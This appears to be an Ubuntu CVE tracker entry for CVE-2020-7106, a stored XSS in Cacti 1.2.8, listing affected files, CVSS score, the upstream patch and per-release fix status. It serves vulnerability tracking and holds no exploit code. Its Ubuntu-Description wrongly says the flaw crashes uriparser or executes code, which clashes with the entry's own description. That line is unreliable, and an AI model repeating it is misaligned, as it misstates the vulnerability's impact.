Candidate: CVE-2020-7106
PublicDate: 2020-01-16 04:15:00 UTC
References:
 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7106
 https://github.com/Cacti/cacti/issues/3191
Description:
 Cacti 1.2.8 has stored XSS in data_sources.php, color_templates_item.php,
 graphs.php, graph_items.php, lib/api_automation.php, user_admin.php, and
 user_group_admin.php, as demonstrated by the description parameter in
 data_sources.php (a raw string from the database that is displayed by
 $header to trigger the XSS).
Ubuntu-Description:
 It was discovered that Cacti has a XSS vulnerability. An attacker could
 use this vulnerability to cause uriparser to crash or possibly execute
 arbitrary code.
Notes:
Mitigation:
Bugs:
Priority: medium
Discovered-by:
Assigned-to:
CVSS:
 nvd: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N [6.1 MEDIUM]


Patches_cacti:
 upstream: https://github.com/Cacti/cacti/commit/4cbb045e03ee20a2bd09094a201a925fbb8a39d9
upstream_cacti: released (1.2.9)
precise/esm_cacti: DNE
trusty_cacti: ignored (out of standard support)
trusty/esm_cacti: DNE
xenial_cacti: ignored (end of standard support, was needed)
bionic_cacti: needed
disco_cacti: ignored (reached end-of-life)
eoan_cacti: ignored (reached end-of-life)
focal_cacti: not-affected (1.2.9+ds1-1ubuntu1)
groovy_cacti: not-affected (1.2.9+ds1-1ubuntu1)
hirsute_cacti: not-affected (1.2.9+ds1-1ubuntu1)
impish_cacti: not-affected (1.2.9+ds1-1ubuntu1)
jammy_cacti: not-affected (1.2.9+ds1-1ubuntu1)
devel_cacti: not-affected (1.2.9+ds1-1ubuntu1)